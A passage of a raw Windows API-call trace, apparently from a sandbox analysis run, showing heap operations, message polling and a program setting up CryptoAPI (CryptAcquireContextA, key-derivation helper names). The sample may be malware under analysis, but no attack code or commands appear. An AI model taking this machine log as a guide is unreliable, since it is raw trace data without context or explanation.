lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0191.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0191.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0191.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0191.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0191.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0191.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.586] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.587] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.587] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0191.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0191.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0191.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0191.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0191.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0191.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0191.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0191.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0191.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x90d420, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0191.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0191.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.592] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContext") returned 0x0 [0191.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0191.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0191.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0191.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0191.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15) returned 0x90d420 [0191.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x90d420, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0191.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0191.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.593] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContextA") returned 0x74f291dd [0191.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0191.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0191.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0191.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0191.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0191.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0191.593] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0191.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0191.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.595] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0191.595] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.595] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0191.595] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.595] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.595] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.595] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.595] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0191.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.595] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.596] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.596] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0191.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.596] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.596] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0191.596] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.596] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0191.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.597] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.597] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.597] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.597] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, 